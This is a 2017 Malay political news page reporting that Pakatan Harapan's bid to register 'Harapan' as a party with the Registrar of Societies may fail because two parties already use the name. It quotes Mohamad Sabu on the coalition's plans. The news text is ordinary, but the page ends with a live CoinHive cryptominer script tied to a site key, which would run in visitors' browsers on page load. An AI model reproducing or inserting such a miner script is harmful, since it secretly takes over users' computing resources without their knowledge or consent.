© Copyright 2017, All Rights Reserved
Home / Politik / Pakatan Harapan Tidak Diluluskan RoS

Pakatan Harapan Tidak Diluluskan RoS

AIDCNews -17/07/17 –Hasrat Pakatan Harapan untuk mendaftar ‘Harapan’ kepada Jabatan Pendaftar Pertubuhan (RoS) sebagai satu parti mungkin tidak kesampaian memandangkan sudah ada dua parti yang menggunakan nama yang sama.

Malaysiapropagandanews mendedahkan pada 25 Oktober 2016 RoS telah meluluskan pendaftaran penubuhan Parti Harapan Rakyat Sabah (Harapan Rakyat) diterajui bekas Pengerusi PKR Sabah, Datuk Seri Lajim Ukin.

Lajim turut membantah penggunaan singkatan ‘Harapan’ untuk mana-mana pertubuhan politik selain parti berkenaan di negara ini kerana berpendapat ia boleh mengelirukan orang ramai.

“Dalam pada itu seorang lagi bekas Naib Ketua Cabang PKR Lembah Pantai, Johari Musa telah mendaftarkan Parti Harapan Malaysia (PHM) dengan Jabatan Pendaftaran Pertubuhan dan masih menunggu status pendaftaran mereka dari RoS.

“Bukan perkara baru jika RoS tidak meluluskan atau meminta perubahan pendaftarab parti. Parti Pribumi Bersatu Malaysia (PPBM) 8 September 2016 yang diluluskan oleh Jabatan Pendaftaran Pertubuhan misalnya tidak boleh menggunakan singkatan BERSATU sebaliknya hanya PPBM.

“PPBM telah diberi amaran melalui surat 9 November 2016 daripada ROS mengingatkan dan memberi amaran kepada PPBM supaya tidak lagi menggunakan nama BERSATU dalam apa juga bentuk program dan aktiviti parti termasuk ceramah, penerbitan serta penggunaan poster, bunting, kain rentang dan sebagainya.

“Oleh itu pendaftaran Pakatan Harapan amat pasti akan mengalami masalah kelulusan dalam mendaftarkannya. RoS pasti akan menolak jika terdapat bantahan dari pihak yang diluluskan sebelum ini,”lapornya.

Sementara itu, Presiden PAN, Mohamad Sabu mengesahkan struktur kepimpinan bersama logo Pakatan Harapan belum lagi dihantar kepada RoS untuk mendapat kelulusan.

“Kita tak tentukan tarikh lagi, tapi secepat mungkin. Kita mungkin ada mesyuarat pada minggu ini, kemudian kita akan hantar.

“Ada mesyuarat dalam masa terdekat, kemudian kita nak luluskan beberapa perkara, dan selepas itu boleh hantar,” katanya kepada Antarapos ketika ditanya mengenai perkembangan bersabit proses pendaftaran gabungan itu.

Dalam pada itu ketika ditanya kesediaan parti-parti itu melepaskan logo masing-masing kelak, jawab Mohamad Sabu, ia sesuatu yang ‘terpaksa’ dilakukan demi satu matlamat yang besar.

“Terpaksa, kita kena sanggup melepaskanlah logo masing-masing. Amanah parti baru, sementara Keadilan (PKR) dan DAP parti lama, lagi berat,” katanya lagi.


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Mempengerusikan Mesyuarat Peringkat Tinggi Mengenai Pasukan Petugas Khas Sekolah-sekolah Tahfiz

PUTRAJAYA, 19 Sept — Timbalan Perdana Menteri Datuk Seri Dr Ahmad Zahid ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();